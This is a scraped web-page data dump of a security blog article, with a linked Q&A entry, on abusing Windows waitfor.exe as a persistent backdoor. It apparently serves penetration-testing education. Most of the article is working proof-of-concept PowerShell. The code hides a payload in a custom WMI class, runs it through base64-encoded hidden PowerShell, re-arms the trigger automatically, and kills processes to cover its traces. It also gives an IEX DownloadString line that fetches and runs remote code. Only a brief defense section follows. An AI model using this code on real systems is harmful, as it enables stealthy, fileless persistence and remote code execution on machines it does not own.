[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fS1tacoMJ5E1StixuQZ-g9yCyOtTJvDr4wv3_c8Vlvrs":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},282,"What is the WMI-based persistence technique used in the Waitfor.exe POC?","The WMI-based technique stores the backdoor payload inside a custom WMI class (Win32_Backdoor) on the target system. After storing the payload as a property, the waitfor command reads and executes it via PowerShell using base64‑encoded commands. This avoids leaving files on disk, and the loop can be designed to automatically re‑arm the waitfor listener after each trigger. The full implementation is detailed in [Use Waitfor.exe to maintain persistence](\u002Fnews\u002Fuse-waitfor-exe-to-maintain-persistence).","\u003Cp>The WMI-based technique stores the backdoor payload inside a custom WMI class (Win32_Backdoor) on the target system. After storing the payload as a property, the waitfor command reads and executes it via PowerShell using base64‑encoded commands. This avoids leaving files on disk, and the loop can be designed to automatically re‑arm the waitfor listener after each trigger. The full implementation is detailed in [Use Waitfor.exe to maintain persistence](\u002Fnews\u002Fuse-waitfor-exe-to-maintain-persistence).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fuse-waitfor-exe-to-maintain-persistence\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-the-wmi-based-persistence-technique-used-in-the-waitforexe-poc-1777484442479","WMI, persistence, payload, base64, PowerShell, backdoor",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},73,"Use Waitfor.exe to maintain persistence","use-waitfor-exe-to-maintain-persistence","Learn how to use Waitfor.exe for backdoor persistence in Windows. Explore exploitation techniques, POC details, and PowerShell integration for penetration testing.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>An idea obtained from Casey Smith‏@subTee's Twitter suggests that Waitfor.exe could potentially be used to implement a backdoor mechanism.\u003C\u002Fp>\u003Cp>Therefore, I conducted further research on it and developed a proof-of-concept (POC) for backdoor exploitation using PowerShell.\u003C\u002Fp>\u003Cp>This article will introduce the exploitation techniques of Waitfor.exe in penetration testing and share the ideas and details of developing the POC.\u003C\u002Fp>\u003Cp>The complete POC download link is as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will specifically cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to Waitfor.exe\u003C\u002Fli>\u003Cli>Exploitation ideas\u003C\u002Fli>\u003Cli>POC details\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Introduction to Waitfor.exe\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Used to synchronize computers in a network, can send or wait for signals on the system\u003C\u002Fp>\u003Cp>\u003Cstrong>Supported systems:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Windows Server 2003\u003C\u002Fli>\u003Cli>Windows Vista\u003C\u002Fli>\u003Cli>Windows XP\u003C\u002Fli>\u003Cli>Windows Server 2008\u003C\u002Fli>\u003Cli>Windows 7\u003C\u002Fli>\u003Cli>Windows Server 2003 with SP2\u003C\u002Fli>\u003Cli>Windows Server 2003 R2\u003C\u002Fli>\u003Cli>Windows Server 2008 R2\u003C\u002Fli>\u003Cli>Windows Server 2000\u003C\u002Fli>\u003Cli>Windows Server 2012\u003C\u002Fli>\u003Cli>Windows Server 2003 with SP1\u003C\u002Fli>\u003Cli>Windows 8\u003C\u002Fli>\u003Cli>Windows 10\u003C\u002Fli>\u003Cli>Other Server systems not tested, theoretically supported\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Located in the System32 folder, started via command line\u003C\u002Fp>\u003Cp>Supported parameters as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018752102_0_279caba337.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Specific details are as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fs \u003Ccomputer>: Specifies the name or IP address of the destination computer to send to (backslashes cannot be used). If this parameter is omitted, the signal will be broadcast within the domain.\u003Cbr>\u003Cbr>\u002Fu [\u003Cdomain>\\]\u003Cuser>: Runs the script with the credentials of the specified user account. If this parameter is omitted, the current user's credentials are used.\u003Cbr>\u003Cbr>\u002Fp [\u003Cpassword>]: User password\u003Cbr>\u003Cbr>\u002Fsi: Indicates sending a signal for activation. If this parameter is omitted, it means waiting to receive a signal.\u003Cbr>\u003Cbr>\u002Ft \u003Ctimeout>: Specifies the number of seconds to wait for the signal. If this parameter is omitted, it waits indefinitely.\u003Cbr>\u003Cbr>\u003Csignalname>: Specified signal name, case-insensitive, length cannot exceed 225 characters\u003C\u002Fsignalname>\u003C\u002Ftimeout>\u003C\u002Fpassword>\u003C\u002Fuser>\u003C\u002Fdomain>\u003C\u002Fcomputer>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Computers can only receive signals if they are in the same domain as the computer sending the signal.\u003C\u002Fp>\u003Cp>That is, only hosts on the same network segment can receive signals.\u003C\u002Fp>\u003Cp>\u003Cstrong>Primary Purpose:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Execute commands simultaneously on hosts within the same network segment\u003C\u002Fp>\u003Ch3>Test Example:\u003C\u002Fh3>\u003Cp>\u003Cstrong>Enable waiting mode:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor signalcalc &amp;&amp; calc.exe\u003C\u002Fp>\u003Cp>Parameter Description:\u003C\u002Fp>\u003Cul>\u003Cli>Signal Name: signalcalc\u003C\u002Fli>\u003Cli>Action after receiving signal: calc.exe, i.e., launch calculator\u003C\u002Fli>\u003C\u002Ful>\u003Cp>At this point, the waitfor.exe process exists in the background\u003C\u002Fp>\u003Cp>\u003Cstrong>Send Signal:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi signalcalc\u003C\u002Fp>\u003Cp>Parameter Description:\u003C\u002Fp>\u003Cul>\u003Cli>Target Computer: 127.0.0.1 (for local testing), replace with host IP for domain use\u003C\u002Fli>\u003Cli>\u002Fsi indicates sending a signal\u003C\u002Fli>\u003Cli>Signal name: signalcalc\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Detailed operation as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018764469_1_4ba692e269.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For more basic introduction, please refer to the official Microsoft documentation, link as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftechnet.microsoft.com\u002Fen-us\u002Flibrary\u002Fcc731613(v=ws.11).aspx\u003C\u002Fp>\u003Ch2>0x03 Exploitation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Based on the above basic introduction, the most intuitive understanding is that waitfor can be used as a backdoor\u003C\u002Fp>\u003Cp>Daniel Bohannon‏ @danielhbohannon shared his exploitation approach on Twitter: setting the operation after waitfor receives a signal to download and execute PowerShell code from a remote server\u003C\u002Fp>\u003Cp>Address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002Fdanielhbohannon\u002Fstatus\u002F872258924078092288\u003C\u002Fp>\u003Cp>Details as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018783010_2_eed993f03b.jpeg\">\u003C\u002Fp>\u003Cp>Additionally, he mentioned an interesting technique: if PowerShell code is set to execute with a delay, then after receiving the signal, there will be no waitfor.exe process running in the background.\u003C\u002Fp>\u003Cp>I verified this conclusion using the following method:\u003C\u002Fp>\u003Cp>\u003Cstrong>Enable waiting mode:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor test1 &amp;&amp; &amp;&amp; powershell IEX (New-Object Net.WebClient).DownloadString('https:\u002F\u002Fraw.githubusercontent.某开源项目.ps1')\u003C\u002Fp>\u003Cp>\u003Cstrong>Send signal:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi test1\u003C\u002Fp>\u003Cp>The content of https:\u002F\u002Fraw.githubusercontent.某开源项目.ps1 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Start-Sleep -Seconds 10;\u003Cbr>start-process calc.exe;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After successfully receiving the signal, the waitfor.exe process exits.\u003C\u002Fp>\u003Cp>Then execute the PowerShell script, wait for 10 seconds before starting calc.exe.\u003C\u002Fp>\u003Cp>During these 10 seconds, only the powershell.exe process exists.\u003C\u002Fp>\u003Cp>In other words, if the waiting time is set longer, there will be no waitfor.exe process during that waiting period, reminding defenders to pay attention to this detail.\u003C\u002Fp>\u003Ch2>0x04 POC Details\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>If used as a backdoor, the above exploitation method is not yet mature\u003C\u002Fp>\u003Cp>Because after triggering once, the process waitfor.exe will exit, making the backdoor non-reusable\u003C\u002Fp>\u003Cp>It is necessary to start a waiting mode again to trigger the backdoor once more\u003C\u002Fp>\u003Cp>Of course, a waiting mode can be manually started after each backdoor trigger\u003C\u002Fp>\u003Cp>But this is not intelligent enough. Can a script be used to automatically start the waiting mode, making it a sustainable backdoor?\u003C\u002Fp>\u003Cp>For this purpose, I wrote the following POC\u003C\u002Fp>\u003Ch3>Idea 1:\u003C\u002Fh3>\u003Cp>Save a PowerShell script named 1.ps1 on the target system\u003C\u002Fp>\u003Cp>The content of 1.ps1 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>start-process calc.exe\u003Cbr>cmd \u002Fc waitfor persist &amp;&amp; powershell -executionpolicy bypass -file c:\\test\\1.ps1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The escape character &amp; in PowerShell must be represented as `&amp;\u003C\u002Fp>\u003Cp>\u003Cstrong>Enable waiting mode:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor persist1 &amp;&amp; powershell -executionpolicy bypass -file c:\\test\\1.ps1\u003C\u002Fp>\u003Cp>\u003Cstrong>Send signal:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi persist1\u003C\u002Fp>\u003Ch3>Approach 2:\u003C\u002Fh3>\u003Cp>Do not save files on the target system\u003C\u002Fp>\u003Cp>Here we use a technique previously introduced in 'WMI backdoor' to store the payload in a WMI class for reading and usage\u003C\u002Fp>\u003Cp>Store payload:\u003C\u002Fp>\u003Cp>(Administrator privileges)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$StaticClass = New-Object Management.ManagementClass('root\\cimv2', $null,$null)\u003Cbr>$StaticClass.Name = 'Win32_Backdoor'\u003Cbr>$StaticClass.Put()\u003Cbr>$StaticClass.Properties.Add('Code' , \"cmd \u002Fc start calc.exe\")\u003Cbr>$StaticClass.Put() \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Read payload:\u003C\u002Fp>\u003Cp>([WmiClass] 'Win32_Backdoor').Properties['Code'].Value\u003C\u002Fp>\u003Cp>The above operations are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018792403_3_2a4e2fc515.jpeg\">\u003C\u002Fp>\u003Cp>Execute payload:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;\u003Cbr>iex $exec\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using Invoke-Expression to execute commands is also possible; using iex is to shorten the length\u003C\u002Fp>\u003Cp>Combined with the parameter format of waitfor, here we choose to encode the code as base64\u003C\u002Fp>\u003Cp>Base64 encode the code for executing the payload, the following code is saved in code.txt:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;\u003Cbr>iex $exec\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Base64 encode it, the code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$code = Get-Content -Path code.txt\u003Cbr>$bytes = [System.Text.Encoding]::UNICODE.GetBytes($code);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes)\u003Cbr>$encoded\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The base64 encrypted code is as follows:\u003C\u002Fp>\u003Cp>JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==\u003C\u002Fp>\u003Cp>The above operation is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018803371_4_ebfc3b1ba6.jpeg\">\u003C\u002Fp>\u003Cp>Testing base64 encrypted code:\u003C\u002Fp>\u003Cp>powershell -nop -E JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==\u003C\u002Fp>\u003Cp>Code executed successfully, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018809918_5_f934d86d60.jpeg\">\u003C\u002Fp>\u003Cp>Based on the above approach, the POC is as follows:\u003C\u002Fp>\u003Cp>Backdoor code:\u003C\u002Fp>\u003Cp>(Administrator privileges)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$StaticClass = New-Object Management.ManagementClass('root\\\\cimv2', $null,$null)\u003Cbr>$StaticClass.Name = 'Win32_Backdoor'\u003Cbr>$StaticClass.Put()\u003Cbr>$StaticClass.Properties.Add('Code' , \"cmd \u002Fc start calc.exe ```&amp;```&amp; waitfor persist ```&amp;```&amp; powershell -nop -E JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==\")\u003Cbr>$StaticClass.Put() \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>There are two layers of escape characters\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>`` is used to represent `\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Installation code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;\u003Cbr>iex $exec\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Activation command:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi persist\u003C\u002Fp>\u003Cp>Actual test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018815834_6_eec2f052c8.jpeg\">\u003C\u002Fp>\u003Cp>There is a bug causing powershell.exe to fail to exit properly, leaving the process lingering in the background\u003C\u002Fp>\u003Cp>Therefore, a piece of code needs to be added to terminate the process powershell.exe\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Based on the logical relationship, the code to terminate powershell.exe should be written before powershell -nop -W Hidden -E ...\u003C\u002Fp>\u003Cp>Finally, the complete POC code is as follows:\u003C\u002Fp>\u003Cp>Backdoor code:\u003C\u002Fp>\u003Cp>(Administrator privileges)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$StaticClass = New-Object Management.ManagementClass('root\\cimv2', $null,$null)\u003Cbr>$StaticClass.Name = 'Win32_Backdoor'\u003Cbr>$StaticClass.Put()| Out-Null\u003Cbr>$StaticClass.Properties.Add('Code' , \"cmd \u002Fc start calc.exe ```&amp;```&amp; taskkill \u002Ff \u002Fim powershell.exe ```&amp;```&amp; waitfor persist ```&amp;```&amp; powershell -nop -W Hidden -E JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==\")\u003Cbr>$StaticClass.Put() | Out-Null\u003Cbr>\u003Cbr>$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;\u003Cbr>iex $exec | Out-Null\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Activation command:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi persist\u003C\u002Fp>\u003Cp>Complete demonstration as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018822287_7_3405375de8.png\">\u003C\u002Fp>\u003Cp>No residual process issues exist\u003C\u002Fp>\u003Ch2>0x05 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Pay attention to the background process waitfor.exe\u003C\u002Fp>\u003Cp>For suspicious background processes cmd.exe and powershell.exe, you can use Process Explorer to view their startup parameters, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018827167_8_45b3c689da.jpeg\">\u003C\u002Fp>\u003Cp>You can also read the historical echo content from the above processes. Reference materials are as follows:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fjblog.javelin-networks.com\u002Fblog\u002Fcli-powershell\u002F\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the implementation approach of the Waitfor.exe backdoor, and there may be more exploitation techniques\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>An idea obtained from Casey Smith‏@subTee's Twitter suggests that Waitfor.exe could potentially be used to implement a backdoor mechanism.\u003C\u002Fp>\u003Cp>Therefore, I conducted further research on it and developed a proof-of-concept (POC) for backdoor exploitation using PowerShell.\u003C\u002Fp>\u003Cp>This article will introduce the exploitation techniques of Waitfor.exe in penetration testing and share the ideas and details of developing the POC.\u003C\u002Fp>\u003Cp>The complete POC download link is as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will specifically cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to Waitfor.exe\u003C\u002Fli>\u003Cli>Exploitation ideas\u003C\u002Fli>\u003Cli>POC details\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Introduction to Waitfor.exe\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Used to synchronize computers in a network, can send or wait for signals on the system\u003C\u002Fp>\u003Cp>\u003Cstrong>Supported systems:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Windows Server 2003\u003C\u002Fli>\u003Cli>Windows Vista\u003C\u002Fli>\u003Cli>Windows XP\u003C\u002Fli>\u003Cli>Windows Server 2008\u003C\u002Fli>\u003Cli>Windows 7\u003C\u002Fli>\u003Cli>Windows Server 2003 with SP2\u003C\u002Fli>\u003Cli>Windows Server 2003 R2\u003C\u002Fli>\u003Cli>Windows Server 2008 R2\u003C\u002Fli>\u003Cli>Windows Server 2000\u003C\u002Fli>\u003Cli>Windows Server 2012\u003C\u002Fli>\u003Cli>Windows Server 2003 with SP1\u003C\u002Fli>\u003Cli>Windows 8\u003C\u002Fli>\u003Cli>Windows 10\u003C\u002Fli>\u003Cli>Other Server systems not tested, theoretically supported\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Located in the System32 folder, started via command line\u003C\u002Fp>\u003Cp>Supported parameters as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018752102_0_279caba337-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Specific details are as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fs \u003Ccomputer>: Specifies the name or IP address of the destination computer to send to (backslashes cannot be used). If this parameter is omitted, the signal will be broadcast within the domain.\u003Cbr>\u003Cbr>\u002Fu [\u003Cdomain>\\]\u003Cuser>: Runs the script with the credentials of the specified user account. If this parameter is omitted, the current user's credentials are used.\u003Cbr>\u003Cbr>\u002Fp [\u003Cpassword>]: User password\u003Cbr>\u003Cbr>\u002Fsi: Indicates sending a signal for activation. If this parameter is omitted, it means waiting to receive a signal.\u003Cbr>\u003Cbr>\u002Ft \u003Ctimeout>: Specifies the number of seconds to wait for the signal. If this parameter is omitted, it waits indefinitely.\u003Cbr>\u003Cbr>\u003Csignalname>: Specified signal name, case-insensitive, length cannot exceed 225 characters\u003C\u002Fsignalname>\u003C\u002Ftimeout>\u003C\u002Fpassword>\u003C\u002Fuser>\u003C\u002Fdomain>\u003C\u002Fcomputer>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Computers can only receive signals if they are in the same domain as the computer sending the signal.\u003C\u002Fp>\u003Cp>That is, only hosts on the same network segment can receive signals.\u003C\u002Fp>\u003Cp>\u003Cstrong>Primary Purpose:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Execute commands simultaneously on hosts within the same network segment\u003C\u002Fp>\u003Ch3>Test Example:\u003C\u002Fh3>\u003Cp>\u003Cstrong>Enable waiting mode:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor signalcalc &amp;&amp; calc.exe\u003C\u002Fp>\u003Cp>Parameter Description:\u003C\u002Fp>\u003Cul>\u003Cli>Signal Name: signalcalc\u003C\u002Fli>\u003Cli>Action after receiving signal: calc.exe, i.e., launch calculator\u003C\u002Fli>\u003C\u002Ful>\u003Cp>At this point, the waitfor.exe process exists in the background\u003C\u002Fp>\u003Cp>\u003Cstrong>Send Signal:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi signalcalc\u003C\u002Fp>\u003Cp>Parameter Description:\u003C\u002Fp>\u003Cul>\u003Cli>Target Computer: 127.0.0.1 (for local testing), replace with host IP for domain use\u003C\u002Fli>\u003Cli>\u002Fsi indicates sending a signal\u003C\u002Fli>\u003Cli>Signal name: signalcalc\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Detailed operation as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018764469_1_4ba692e269-1.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For more basic introduction, please refer to the official Microsoft documentation, link as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftechnet.microsoft.com\u002Fen-us\u002Flibrary\u002Fcc731613(v=ws.11).aspx\u003C\u002Fp>\u003Ch2>0x03 Exploitation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Based on the above basic introduction, the most intuitive understanding is that waitfor can be used as a backdoor\u003C\u002Fp>\u003Cp>Daniel Bohannon‏ @danielhbohannon shared his exploitation approach on Twitter: setting the operation after waitfor receives a signal to download and execute PowerShell code from a remote server\u003C\u002Fp>\u003Cp>Address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002Fdanielhbohannon\u002Fstatus\u002F872258924078092288\u003C\u002Fp>\u003Cp>Details as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018783010_2_eed993f03b-1.jpeg\">\u003C\u002Fp>\u003Cp>Additionally, he mentioned an interesting technique: if PowerShell code is set to execute with a delay, then after receiving the signal, there will be no waitfor.exe process running in the background.\u003C\u002Fp>\u003Cp>I verified this conclusion using the following method:\u003C\u002Fp>\u003Cp>\u003Cstrong>Enable waiting mode:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor test1 &amp;&amp; &amp;&amp; powershell IEX (New-Object Net.WebClient).DownloadString('https:\u002F\u002Fraw.githubusercontent.某开源项目.ps1')\u003C\u002Fp>\u003Cp>\u003Cstrong>Send signal:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi test1\u003C\u002Fp>\u003Cp>The content of https:\u002F\u002Fraw.githubusercontent.某开源项目.ps1 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Start-Sleep -Seconds 10;\u003Cbr>start-process calc.exe;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After successfully receiving the signal, the waitfor.exe process exits.\u003C\u002Fp>\u003Cp>Then execute the PowerShell script, wait for 10 seconds before starting calc.exe.\u003C\u002Fp>\u003Cp>During these 10 seconds, only the powershell.exe process exists.\u003C\u002Fp>\u003Cp>In other words, if the waiting time is set longer, there will be no waitfor.exe process during that waiting period, reminding defenders to pay attention to this detail.\u003C\u002Fp>\u003Ch2>0x04 POC Details\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>If used as a backdoor, the above exploitation method is not yet mature\u003C\u002Fp>\u003Cp>Because after triggering once, the process waitfor.exe will exit, making the backdoor non-reusable\u003C\u002Fp>\u003Cp>It is necessary to start a waiting mode again to trigger the backdoor once more\u003C\u002Fp>\u003Cp>Of course, a waiting mode can be manually started after each backdoor trigger\u003C\u002Fp>\u003Cp>But this is not intelligent enough. Can a script be used to automatically start the waiting mode, making it a sustainable backdoor?\u003C\u002Fp>\u003Cp>For this purpose, I wrote the following POC\u003C\u002Fp>\u003Ch3>Idea 1:\u003C\u002Fh3>\u003Cp>Save a PowerShell script 